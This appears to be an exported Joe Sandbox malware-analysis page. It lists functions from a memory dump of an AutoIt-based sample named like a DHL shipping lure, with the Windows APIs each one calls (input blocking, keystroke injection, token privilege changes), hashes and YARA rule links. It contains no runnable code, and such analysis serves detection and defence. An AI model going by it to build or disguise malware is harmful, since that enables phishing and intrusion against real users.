Instruction ID: a0602286becfdc802f4eddef53c42d509648225c1ccddba421968f22b0f052ed
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: BE021B71E002199BDF14DFA9D9806ADBBF1FF48324F25816AE919E7380D731AE418F94

Function 00AD68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00AD6918
FindClose.KERNEL32(00000000), ref: 00AD6961

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 02676cfa013b55a0195c9ab464ba4e2c193fb5b860500b35e19440fd0dee44c4
Instruction ID: 9baf1090db498e64f81ff3a173e995e3e2fd432de20c6aa5a3893238d174b4fa
Opcode Fuzzy Hash: 02676cfa013b55a0195c9ab464ba4e2c193fb5b860500b35e19440fd0dee44c4
Instruction Fuzzy Hash: 4411B2316142009FC710DF69D484A26BBE5FF89328F14C69AF46A8F3A2C730EC05CB91

Function 00AD37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00AE4891,?,?,00000035,?), ref: 00AD37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00AE4891,?,?,00000035,?), ref: 00AD37F4

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 9351f333e0bd93d81424c4b29c5b76a53e78bf962c34c0b8f35d2b1b7361ed89
Instruction ID: 5b648860e1c3e845dba2374faa9f5e1b7aafa8077a2e14fa679eab8e153b4d6f
Opcode Fuzzy Hash: 9351f333e0bd93d81424c4b29c5b76a53e78bf962c34c0b8f35d2b1b7361ed89
Instruction Fuzzy Hash: 6CF0ECB56052192ADB1057A64D4DFEB766DDFC5771F000166F505E22C1D5605904C6B1

Function 00ACB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00ACB25D
keybd_event.USER32(?,753DC0D0,?,00000000), ref: 00ACB270

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 649afa4dae3842384edf6b00dd1eda3970d6de121a2a14823fedb4b92d317f90
Instruction ID: 0b8339dabb7bb8a0ed7609036519af5be1f206e7043c1067d3d8836a64aa1ab5
Opcode Fuzzy Hash: 649afa4dae3842384edf6b00dd1eda3970d6de121a2a14823fedb4b92d317f90
Instruction Fuzzy Hash: 82F01D7581424DABDB05DFA1C806BFE7BB4FF04315F008409F955A6191C3799615DFA4

Function 00AC10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AC11FC), ref: 00AC10D4
CloseHandle.KERNEL32(?,?,00AC11FC), ref: 00AC10E9

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: ef7c2fc3c83b706cb3588200022e75a968be26b1c239bb3e1ef9a3f2f3f813df
Instruction ID: 488d3bcc660c6266362bac737c461e77c79faf92cca441d227b5dff8ff7eb416
Opcode Fuzzy Hash: ef7c2fc3c83b706cb3588200022e75a968be26b1c239bb3e1ef9a3f2f3f813df
Instruction Fuzzy Hash: 6BE04F32008600AEE7252B91FD05E7377A9EF04320B10C82DF4A5804B1DB626C91DB10

Function 00A6CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00AB0C40

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 483c7c83c8d7e89ff14e37d80646d7922d2cf0244496869904cbefc9286ce685
Instruction ID: 56e21f481776880d355a12624a4a0e8643a402f7d38378f7f5e586e49f3f6229
Opcode Fuzzy Hash: 483c7c83c8d7e89ff14e37d80646d7922d2cf0244496869904cbefc9286ce685
Instruction Fuzzy Hash: 13326970900218DFCF14DF94C985AFEB7B9FF05314F248069E846AB292DB75AE45CB61

Function 00A9676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A96766,?,?,00000008,?,?,00A9FEFE,00000000), ref: 00A96998

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 728254469b1f026b1cb826247f6fe652e51febd75559deeb870161d1695309bd
Instruction ID: 2620f7a11f48875de54e010bcf73e70282b2395533199cc716a1de37c03a62ae
Opcode Fuzzy Hash: 728254469b1f026b1cb826247f6fe652e51febd75559deeb870161d1695309bd
Instruction Fuzzy Hash: AAB13A316106089FDB19CF28C48AB657BF0FF45364F29C658E8A9CF2A2C735E991CB40

Function 00A7B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 00AB851F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b8b3b38fbeac16727ffac2b824f460da3bdc6278354c617ed0307875228352c2
Instruction ID: 1b109154d38080313e8021b87b3238bc02ba630252b9efdb660fb3fde19339ab
Opcode Fuzzy Hash: b8b3b38fbeac16727ffac2b824f460da3bdc6278354c617ed0307875228352c2
Instruction Fuzzy Hash: 341242B59102199BCB14CF58C9807EEB7F9FF48710F14C19AE849EB255DB349E81CBA0

Function 00ADEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00ADEABD

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: c1aa0976f26608de5fd9c3a13eb52b5b998a4f38feab73d4b2a9b8a0279c5193
Instruction ID: ac3bc3045fce3487233a6e799f28987912cee374f79d4e21c5ef7935c47d1d72
Opcode Fuzzy Hash: c1aa0976f26608de5fd9c3a13eb52b5b998a4f38feab73d4b2a9b8a0279c5193
Instruction Fuzzy Hash: 49E012312102059FC710EF99D504D9AF7E9AF58770F008416FC46CB361D670A8418B90

Function 00A809D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00A803EE), ref: 00A809DA

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9d6f97cfaeff5bb7a1dc35ab790021483e1ee02cbc7b00ffe388e0c21db80628
Instruction ID: 3c053cbeb4e9aaabae463837301944bf894113c25febcfad407c265148c72735
Opcode Fuzzy Hash: 9d6f97cfaeff5bb7a1dc35ab790021483e1ee02cbc7b00ffe388e0c21db80628
Instruction Fuzzy Hash:

Function 00A8781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 00A8798B

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 7809c7d4faf86d8e52f303eda94245096871ad88f186929b404e3299068a951b
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 0851BB7160C7055BDF38BB78899EBBE77E99B02380F380519D887C7282DA15DE81D352

Function 00A96DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c286d4bb936a0c9a23571f37d43048ea249a10d543096f57de8c0f006c54b082
Instruction ID: ceaf9876396891e46c9b01ae042563edd5bda3d95dcd4749ac15f88829934db3
Opcode Fuzzy Hash: c286d4bb936a0c9a23571f37d43048ea249a10d543096f57de8c0f006c54b082
Instruction Fuzzy Hash: EC320421E79F014DDB279634CC2633A6689AFB73C5F15D737E81AB69A6EF29C4834100

Function 00A7CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9c0ff584df61df92a4e3997deb7b3f526396736b6064e4d2ea315b0e9e0e19
Instruction ID: 6e1a83d1d80c8250417d5e4845232cbdec6438e0c96d32fcf298cb61341fa869
Opcode Fuzzy Hash: 2f9c0ff584df61df92a4e3997deb7b3f526396736b6064e4d2ea315b0e9e0e19
Instruction Fuzzy Hash: 1832E232A001558BDF39CB29C8A4EFD7BB9EB45330F28C56AD45A9B293D634DD81DB40

Function 00A67920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb36d05afcd64bf2262c2a676a21208b41e29ecad7c8359b9ec16778c2aeefa9
Instruction ID: fa0b67ddecc5ed2900c3da78b094692c2d0ae71935287fe29110e4f45f95a2fa
Opcode Fuzzy Hash: eb36d05afcd64bf2262c2a676a21208b41e29ecad7c8359b9ec16778c2aeefa9
Instruction Fuzzy Hash: 2A22D270E00609DFDF14CFA4C941AAEB3F6FF59304F248529E816AB291EB369E15CB54

Function 00A691C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a99fb78141f9d0880ce36511488348445fbd83eb66177bc8fabf11ddf51e17b
Instruction ID: b43e225f7de8c4756a5dbd8d06fb1d1b8e7218ff90fd426e9a15c0a03ed236ea
Opcode Fuzzy Hash: 5a99fb78141f9d0880ce36511488348445fbd83eb66177bc8fabf11ddf51e17b
Instruction Fuzzy Hash: FB02B6B1A00205EFDF14DF64D981AAEB7B5FF45340F208169E80ADB2D1EB31AE11CB91

Function 00A819B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: aa1bf628b9b1c6f7aac97de3d9deebd951d2c3f42185b992f34e8a625166ae52
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 409163722090A34EDB2D577A957803DFFF95A923A231A079ED4F2CA1C1FE14C566D720

Function 00A87A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31af71aee660670eda7c1be90ea03251fd8504233b6dfb6b973b40b44dcfd571
Instruction ID: 3028f2037199fd13629e3af14e7414e9470fef71ccfb8b4eef4e8831fea9eebf
Opcode Fuzzy Hash: 31af71aee660670eda7c1be90ea03251fd8504233b6dfb6b973b40b44dcfd571
Instruction Fuzzy Hash: 24618B7160C70996DE38BB288D99BBFB3A6DF51780F740919E883DB2C1DA15DE42C325

Function 00A87CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9516554db5c119bfadb5e330f5b60e4a16ddf6aa6820819cb6e0dfb5770a59c6
Instruction ID: 00b811c705f7975018b1d4f57ab94161db1683c3a4556eda0b4fee496c09385f
Opcode Fuzzy Hash: 9516554db5c119bfadb5e330f5b60e4a16ddf6aa6820819cb6e0dfb5770a59c6
Instruction Fuzzy Hash: 9661BD3160C70997DE38BB284995BBF7394EF42744F301959E883DF281EA16ED428B55

Function 00A81706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: a555615fc2f2983b7318d454fbcf56062fdced863f0cccecb822c8307260cb42
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: F28184336080A30EDB6D573A857547EFFE56A923A131A079ED4F2CB1C1EE24C556E720

Function 00A7D065 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b7f7f33586ae0a9f7b67fd62cc5d2a1001def03de17efeb0455d76ac382c15a
Instruction ID: 8fd56443022b97a3a07fefd4f152cb56533ed83b83c2ec3f0d05592779bd8b7e
Opcode Fuzzy Hash: 1b7f7f33586ae0a9f7b67fd62cc5d2a1001def03de17efeb0455d76ac382c15a
Instruction Fuzzy Hash: D95125A584FBE56FE7079738C8AA184FF70AC1B05434886DFC6C14A8AFD3A1441AD75B

Function 00AD2046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e4a44b148f4cef301faa934c0a7e85d79341c58688ae9cbc3efe150f29affb0
Instruction ID: 2bc5b2e36949d86837aa680ef6df67c9b15ebb092175d9c2d2ed74179d912db0
Opcode Fuzzy Hash: 1e4a44b148f4cef301faa934c0a7e85d79341c58688ae9cbc3efe150f29affb0
Instruction Fuzzy Hash: 7021B7326206118BD728CF79C92367E73E5AB64320F25862EE4A7C37D0DE35AD04CB80

Function 00AE2ADE Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00AE2B30
DeleteObject.GDI32(00000000), ref: 00AE2B43
DestroyWindow.USER32 ref: 00AE2B52
GetDesktopWindow.USER32 ref: 00AE2B6D
GetWindowRect.USER32(00000000), ref: 00AE2B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00AE2CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00AE2CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE2CF8
GetClientRect.USER32(00000000,?), ref: 00AE2D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AE2D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE2D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE2D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE2D80
GlobalLock.KERNEL32(00000000), ref: 00AE2D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE2D98
GlobalUnlock.KERNEL32(00000000), ref: 00AE2DA1
